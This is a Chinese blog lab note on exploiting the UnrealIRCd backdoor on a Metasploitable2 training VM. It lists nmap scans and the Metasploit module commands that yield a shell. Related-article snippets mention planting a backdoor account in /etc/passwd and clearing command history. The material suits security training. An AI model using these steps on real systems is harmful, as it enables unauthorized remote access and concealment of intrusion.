kali linux对Metasploitable2漏洞利用,irc后门利用 笔记

最新推荐文章于 2024-05-12 16:27:06 发布
最新推荐文章于 2024-05-12 16:27:06 发布
阅读量1.2k 收藏 4
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30508729/article/details/101082507
版权

IRC是Internet Relay Chat 的英文缩写,中文一般称为互联网中继聊天。它是由芬兰人Jarkko Oikarinen于1988年首创的一种网络聊天协议。经过十年的发展,目前世界上有超过60个国家提供了IRC的服务。IRC的工作原理非常简单,您只要在自己的PC上运行客户端软件,然后通过因特网以IRC协议连接到一台IRC服务器上即可。它的特点是速度非常之快,聊天时几乎没有延迟的现象,并且只占用很小的带宽资源。所有用户可以在一个被称为\"Channel\"(频道)的地方就某一话题进行交谈或密谈。每个IRC的使用者都有一个Nickname(昵称)。

实验环境:
攻击机:kali linux 
ip:192.168.172.134
目标机:Metasploittable2
ip:192.168.172.129

攻击过程:


step1:探测
 

nmap 192.168.172.129

nmap -sV -p 5432 192.168.172.129

step2:漏洞利用

启动msf

命令:search ircd

use exploit/unix/irc/unreal_ircd_3281_backdoor

show options

set rhosts 192.168.172.129

run

获得shell


 

02be55f
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
unrealircd:用于UnrealIRCd的FedoraCentOS打包
02-14
虚幻的RPM 用于UnrealIRCd的Fedora / CentOS包装。 关于 这是Fedora的/ CentOS的包装基于由创建的原始规范 。 更新:该软件包现已在Fedora和EPEL官方存储库。 建议迁移到此软件包。 此处提供的规范和相关内部版本将不再维护。 建物 可以在我的Copr上找到构建版本,为 。 可以通过以下方式在所有受支持的系统上添加此仓库: dnf copr enable losuler/unrealircd 设定档 为了改变用于TLS证书的默认位置(它是/etc/unrealircd/tls ),例如当你使用certbot ,使用下面的块中/etc/unrealircd/unrealircd.conf : set { tls { certificate "/path/to/cert"; key "/path/to/
kali Linux系统的漏洞利用
最新发布
06-19
通过以上介绍,我们可以了解到Kali Linux系统中如何使用Metasploitable操作系统进行安全测试实验,以及如何通过Metasploit框架来进行漏洞利用测试。这对于学习网络安全技术、提高防御能力具有重要意义。
Metasploitable2靶机之第八篇--UnreallRCd后门漏洞
千寻的博客
04-03 1229
文章目录环境漏洞利用摘抄 环境 漏洞利用 摘抄 “I am going to live every minute of it” 我将珍惜活着的每一分钟。 – 《心灵奇旅》
UnrealIRCd后门漏洞
m0_62670778的博客
05-12 389
IRC是Internet Relay Chat 的英文缩写,中文一般称为互联网中继聊天它是由芬兰人Jarkko Oikarinen于1988年首创的一种网络聊天协议。经过十年的发展,目前世界上有超过60个国家提供了IRC的服务IRC的工作原理非常简单,您只要在自己的PC上运行客户端软件,然后通过因特网以IRC协议连接到一台IRC服务器上即可。它的特点是速度非常之快,聊天时几乎没有延迟的现象,并且只占用很小的带宽资源。
kali linuxMetasploitable2漏洞利用,ProFTPD爆力破解 笔记
边城浪子的博客
09-19 528
ProFTPD:一个Unix平台上或是类Unix平台上(如Linux, FreeBSD等)的FTP服务器程序 http://www.proftpd.org/ 实验环境: 攻击机:kali linux ip:192.168.172.134 目标机:Metasploittable2 ip:192.168.172.129 攻击过程: step1:探测 nmap -sV -p2121 192...
Metasploit溢出UnrealIRCd后门漏洞
weixin_34185320的博客
12-16 977
Metasploit溢出UnrealIRCd后门漏洞利用UnrealIRCd后门漏洞,获取目标主机的root权限。某些站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程***者能够执行任意代码。一、利用nmap工具扫描目标主机1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。1.2在终端中...
linux漏洞UnrealIRCd Backdoor Detection利用
arissa666的博客
07-06 192
用2020版的KAli系统,msf攻击。新版本使用有可能连接不上。UnrealIRCd Backdoor Detection利用。用bash i 建立交互,就可以查看宿主机相关信息了。进入msf查找并使用工具。
50-50.渗透测试-Kali Linux漏洞利用
05-10
50-50.渗透测试-Kali Linux漏洞利用
安全课堂kali linux笔记1~100课.zip
07-27
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni...目前Kali Linux的最新版本为2019.2,增加了对RTL8812AU网卡的支持
Kali Linux安装ipython2 和 ipython3的方法
12-31
2、安装 pip3 :apt-get install python3-pip 3、安装ipython 2 : pip install ipython. 查看 ipython 命令的所在位置:which /usr/local/bin/ipython 改名: mv /usr/local/bin/ipython /usr/local/bin/ipython2 ...
KALI linux学习记录笔记
05-13
KALI linux学习记录笔记 linux入门的笔记,包括常用命令!
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
信息安全保障实验
07-02
天津大学信息安全与保障实验
kali3、nessus 针对 Metasploitable2-Linux 渗透测试-危急UnrealIRCd后门检测
hzwindpower的博客
01-17 296
1、通过nessus查看到漏洞信息 2、通过kali验证漏洞 CVE-2010-2075,有可以使用的exp 3、查看exp信息 4、执行代码 5、执行成功,查看靶机的信息,查看靶机的ip地址信息
kali linuxMetasploitable2漏洞利用,mysql爆力破解 笔记
边城浪子的博客
09-19 1218
MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下产品。MySQL 是最流行的关系型数据库管理系统之一,在 WEB 应用方面,MySQL是最好的 RDBMS (Relational Database Management System,关系数据库管理系统) 应用软件。 MySQL是一种关系数据库管理系统,关系数据库将数据保存在不同的表中,而不是将所...
6-25漏洞利用-irc后门利用
山兔的博客
08-01 1061
IRC是InternetRelayChat的英文缩写,中文一般称为互联网中继聊天。它是由芬兰人JarkkoOikarinen于1988年首创的一种网络聊天协议。经过十年的发展,目前世界上有超过60个国家提供了IRC的服务,IRC的工作原理非常简单,您只要在自己的PC上运行客户端软件,然后通过因特网以IRC协议连接到一台IRC服务器上即可。这个时候,就可以通过irc聊天,它的特点是速度非常之快,聊天时几乎没有延迟现象,并且只占用很小的带宽资源,使得速度更快。可以看到,很快探测出目标版本信息。...
实验五:使用unreal_ircd服务漏洞创建后门并清除痕迹
weixin_45822468的博客
01-15 412
cat /etc/passwd 这个目录下记录了所有登录用户的详细信息在这个地方留下一个后门。在攻击机上用telnet远端登录使用新建的用户登录(只建立用户名可以登 创了密码不行)echo '用户名:登录口令:0:0:注释:主目录:登陆的shell。history-c 清除历史所有命令。
LINUX IRC使用
horst Hu的专栏
09-23 4195
上班第一件事就是使用IRC,如果系统没有,可以用yum install xchat安装一个(yum不能用的请看其他资料),完成后打开IRC,前面昵称用户名等自己填就可以,然后networks中添加一个服务器,如RHEL,点击edit修改一下配置,在server for RHEL下的第一个修改一下,改成irc.devel.redhat.com/6667,然后添加favorite channels,格
010106漏洞利用
TangTang_AM的博客
03-26 4651
6-1漏洞利用-FTP漏洞利用 1. FTP协议介绍 文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。FTP使用21号端口。 用户分类: 1、Real用户 2、Administrator 3、匿名用户 FTP文件传输格式 1、ASCII 2、二进制格式 2. 利用FTP匿名登录漏洞 由于FTP没有禁止匿名用户,所以可以直接使用Anonymous用户直接登录FTP服务器...
VirtualBox详述:安装Kali Linux 2016.2教程
通过这个教程,读者可以了解到如何利用VirtualBox顺利地安装Kali Linux 2016.2,不仅适用于安全测试,还为开发者提供了一个便捷的开发和学习平台。在实际操作中,确保计算机硬件和网络配置满足要求,安装过程可能会...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值